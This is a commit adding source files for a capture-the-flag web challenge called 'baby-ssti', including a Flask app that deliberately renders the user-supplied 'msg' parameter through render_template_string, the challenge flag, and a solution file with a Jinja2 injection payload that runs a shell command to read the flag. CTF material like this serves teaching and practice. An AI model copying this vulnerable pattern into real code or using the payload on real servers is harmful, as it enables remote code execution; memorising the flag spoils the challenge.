(web): Add source files for baby-ssti

web/baby-ssti/.gitignore

@@ -0,0 +1 @@
+*/__pycache__/*

web/baby-ssti/challenge.yml

@@ -0,0 +1,25 @@
+name: "baby-ssti"
+author: "MariosK"
+category: web
+
+description: |
+  Dive into Baby-SSTI and tinker with templates! Can you inject some fun and execute unexpected code on the server? 
+
+value: 500
+type: dynamic_docker
+extra:
+  initial: 500
+  minimum: 100
+  decay: 25
+  redirect_type: http
+  compose_stack: !filecontents docker-compose.yml
+
+flags:
+  - GTBQ{S3rv3r_S1d3_T3mpl4t3_1nj3ct10n_FTW!!!!!!^_^}
+
+tags:
+  - web
+  - medium
+
+state: visible
+version: "0.1"

web/baby-ssti/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+  web:
+    build:
+      context: ./setup
+      dockerfile: Dockerfile
+    image: ghcr.io/cybermouflons/gtbq-2024/baby-ssti:latest
+    ports:
+      - 5000:5000

web/baby-ssti/setup/.dockerignore

@@ -0,0 +1 @@
+Dockerfile

web/baby-ssti/setup/Dockerfile

@@ -0,0 +1,16 @@
+FROM python:3.8-slim
+
+WORKDIR /app
+
+COPY . /app
+
+RUN pip install --no-cache-dir -r requirements.txt
+
+RUN mv flag.txt /flag$(tr -dc A-Za-z0-9 </dev/urandom | head -c 13 ; echo '').txt
+
+EXPOSE 5000
+
+ENV FLASK_APP=app.py
+ENV FLASK_RUN_HOST=0.0.0.0
+
+CMD ["flask", "run"]

web/baby-ssti/setup/app.py

@@ -0,0 +1,63 @@
+from flask import Flask, request, render_template_string, redirect
+
+app = Flask(__name__)
+
+@app.route('/')
+def welcome():
+
+    if request.args.get('msg') is None:
+        return redirect("/?msg=Welcome")
+
+    msg = request.args.get('msg', 'Welcome')
+
+    template = f"""
+    <!DOCTYPE html>
+    <html lang="en">
+    <head>
+        <meta charset="UTF-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1.0">
+        <title>Welcome</title>
+        <link rel="stylesheet" href="https://hackerthemes.com/bootstrap-themes/demo/theme-machine/neon-glow/css/bootstrap4-neon-glow.css">
+        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
+        <style>
+            html, body {{
+                height: 100%;
+            }}
+            .container {{
+                display: flex;
+                justify-content: center;
+                align-items: center;
+                height: inherit;
+                min-height: inherit;
+            }}
+            .row {{
+                width: 100%;
+            }}
+        </style>
+    </head>
+    <body class="neon-glow">
+        <nav class="navbar fixed-top justify-content-between">
+            <a href="/" class="btn btn-primary neon-border-blue"><i class="fas fa-home"></i> Home</a>
+        </nav>
+        <div class="container">
+            <div class="row justify-content-center">
+                <div class="col-md-6">
+                    <h1 class="text-center neon-text-blue">Welcome</h1>
+                    <!-- Welcome Message -->
+                    <div class="alert alert-success" role="alert">
+                        { msg }
+                    </div>
+                </div>
+            </div>
+        </div>
+
+        <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>        
+    </body>
+    </html>
+    """
+
+    return render_template_string(template)
+
+if __name__ == '__main__':
+    app.run(debug=True)

web/baby-ssti/setup/flag.txt

@@ -0,0 +1 @@
+GTBQ{S3rv3r_S1d3_T3mpl4t3_1nj3ct10n_FTW!!!!!!^_^}

web/baby-ssti/setup/requirements.txt

@@ -0,0 +1 @@
+Flask==3.0.3

web/baby-ssti/solution/sol.md

@@ -0,0 +1,9 @@
+# Solution
+
+This challenge has SSTI (Server Side Template Injection) vulnerability.
+The msg GET parameter is not sanitized and can be used to inject Jinja2 template code.
+The following payload can be used to read the flag:
+
+```py
+{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag*').read() }}
+```